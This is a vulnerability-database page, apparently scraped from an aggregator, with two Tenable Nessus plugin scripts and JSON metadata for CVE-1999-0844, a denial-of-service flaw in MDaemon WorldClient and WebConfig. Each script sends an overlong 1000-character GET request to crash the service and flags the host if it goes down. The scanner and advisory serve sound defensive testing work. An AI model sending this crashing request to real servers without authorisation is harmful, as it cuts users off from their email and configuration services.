Search...

MDaemon WorldClient HTTP Server URL Overflow DoS

1999-11-24T00:00:00

ID MDAEMON_WORLDCLIENT.NASL
Type nessus
Reporter This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
Modified 2018-11-15T00:00:00

Description

It was possible to crash the remote WorldClient web server (which allows users to read their mail remotely) by sending :

GET /aaaaa[...]aaa HTTP/1.0

This issue allows a remote attacker to prevent users from reading their email.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");


if(description)
{
 script_id(10139);
 script_version ("1.29");

 script_cve_id("CVE-1999-0844");
 script_bugtraq_id(823);

 script_name(english:"MDaemon WorldClient HTTP Server URL Overflow DoS");
 script_summary(english:"Crashes the remote service");
 
 script_set_attribute(
   attribute:"synopsis",
   value:"The remote web server has a denial of service vulnerability."
 );
 script_set_attribute( attribute:"description",  value:
"It was possible to crash the remote WorldClient web server (which
allows users to read their mail remotely) by sending :

  GET /aaaaa[...]aaa HTTP/1.0

This issue allows a remote attacker to prevent users from reading
their email." );
 script_set_attribute(
   attribute:"see_also",
   value:"https://seclists.org/bugtraq/1999/Nov/340"
 );
 script_set_attribute(
   attribute:"solution", 
   value:"Upgrade to the latest version of this software."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "1999/11/24");
 script_set_attribute(attribute:"vuln_publication_date", value: "1999/11/24");
 script_cvs_date("Date: 2018/11/15 20:50:25");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_family(english:"Web Servers");

 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");

 script_dependencie("http_version.nasl");
 script_require_ports(2000);
 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = 2000;
if (! get_port_state(port)) exit(0, "Port "+port+" is closed");

if (http_is_dead(port:port)) exit(0, "The web server on port "+port+" is dead");
 
w  = http_send_recv3(method:"GET", port:port, item: crap(1000));
if (http_is_dead(port:port))security_warning(port);

JSON Vulners Source

Initial Source

{"id": "MDAEMON_WORLDCLIENT.NASL", "type": "nessus", "bulletinFamily": "scanner", "title": "MDaemon WorldClient HTTP Server URL Overflow DoS", "description": "It was possible to crash the remote WorldClient web server (which allows users to read their mail remotely) by sending :\n\n GET /aaaaa[...]aaa HTTP/1.0\n\nThis issue allows a remote attacker to prevent users from reading their email.", "published": "1999-11-24T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/10139", "reporter": "This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.", "references": ["https://seclists.org/bugtraq/1999/Nov/340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0844"], "cvelist": ["CVE-1999-0844"], "immutableFields": [], "lastseen": "2021-10-19T03:25:56", "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-0844"]}, {"type": "nessus", "idList": ["MDAEMON_WEBCONFIG.NASL"]}], "rev": 4}, "score": {"value": 5.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "canvas", "idList": ["MDAEMON"]}, {"type": "cve", "idList": ["CVE-1999-0844"]}, {"type": "nessus", "idList": ["HTTP_VERSION.NASL"]}]}, "exploitation": null, "vulnersScore": 5.7}, "pluginID": "10139", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\n\nif(description)\n{\n script_id(10139);\n script_version (\"1.29\");\n\n script_cve_id(\"CVE-1999-0844\");\n script_bugtraq_id(823);\n\n script_name(english:\"MDaemon WorldClient HTTP Server URL Overflow DoS\");\n script_summary(english:\"Crashes the remote service\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server has a denial of service vulnerability.\"\n );\n script_set_attribute( attribute:\"description\", value:\n\"It was possible to crash the remote WorldClient web server (which\nallows users to read their mail remotely) by sending :\n\n GET /aaaaa[...]aaa HTTP/1.0\n\nThis issue allows a remote attacker to prevent users from reading\ntheir email.\" );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/bugtraq/1999/Nov/340\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to the latest version of this software.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"1999/11/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"1999/11/24\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_ports(2000);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = 2000;\nif (! get_port_state(port)) exit(0, \"Port \"+port+\" is closed\");\n\nif (http_is_dead(port:port)) exit(0, \"The web server on port \"+port+\" is dead\");\n \nw = http_send_recv3(method:\"GET\", port:port, item: crap(1000));\nif (http_is_dead(port:port))security_warning(port);\n", "naslFamily": "Web Servers", "cpe": [], "solution": "Upgrade to the latest version of this software.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "4.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": null, "vulnerabilityPublicationDate": "1999-11-24T00:00:00", "exploitableWith": [], "_state": {"dependencies": 1647589307, "score": 0}}

{"cve": [{"lastseen": "2022-03-23T11:42:28", "description": "Denial of service in MDaemon WorldClient and WebConfig services via a long URL.", "cvss3": {}, "published": "1999-11-24T05:00:00", "type": "cve", "title": "CVE-1999-0844", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0844"], "modified": "2008-09-09T12:36:00", "cpe": ["cpe:/a:deerfield:mdaemon:2.8.6", "cpe:/a:deerfield:mdaemon:2.8.5"], "id": "CVE-1999-0844", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0844", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:deerfield:mdaemon:2.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:deerfield:mdaemon:2.8.6:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-10-19T03:25:57", "description": "It was possible to crash Webconfig (which is used to configure MDaemon) by sending the request :\n\n GET /aaaaa[...]aaa HTTP/1.0\n\nThis could allow a remote attacker to crash the web server, preventing the MDaemon server from being configured remotely.", "cvss3": {"score": null, "vector": null}, "published": "1999-11-24T00:00:00", "type": "nessus", "title": "MDaemon WebConfig HTTP Server URL Overflow DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0844"], "modified": "2018-11-15T00:00:00", "cpe": [], "id": "MDAEMON_WEBCONFIG.NASL", "href": "https://www.tenable.com/plugins/nessus/10138", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10138);\n script_version (\"1.29\");\n script_cve_id(\"CVE-1999-0844\");\n script_bugtraq_id(820);\n\n script_name(english:\"MDaemon WebConfig HTTP Server URL Overflow DoS\");\n script_summary(english:\"Crashes the remote service\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server has a denial of service vulnerability.\"\n );\n script_set_attribute( attribute:\"description\", value:\n\"It was possible to crash Webconfig (which is used to configure\nMDaemon) by sending the request :\n\n GET /aaaaa[...]aaa HTTP/1.0\n\nThis could allow a remote attacker to crash the web server, preventing\nthe MDaemon server from being configured remotely.\" );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/bugtraq/1999/Nov/340\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to the latest version of this software.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"1999/11/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"1999/11/24\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_ports(2002);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = 2002;\nif(! get_port_state(port)) exit(0, \"Port \"+port+\" is closed\");\n\nif(http_is_dead(port:port))exit(0, \"The web server on port \"+port+\" is dead\");\n \nw = http_send_recv3(method:\"GET\", item: crap(1000), port:port);\nif (http_is_dead(port:port)) security_warning(port);\n\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}

MDaemon WorldClient HTTP Server URL Overflow DoS

Description

It was possible to crash the remote WorldClient web server (which allows users to read their mail remotely) by sending : GET /aaaaa[...]aaa HTTP/1.0 This issue allows a remote attacker to prevent users from reading their email.

It was possible to crash the remote WorldClient web server (which allows users to read their mail remotely) by sending :

GET /aaaaa[...]aaa HTTP/1.0

This issue allows a remote attacker to prevent users from reading their email.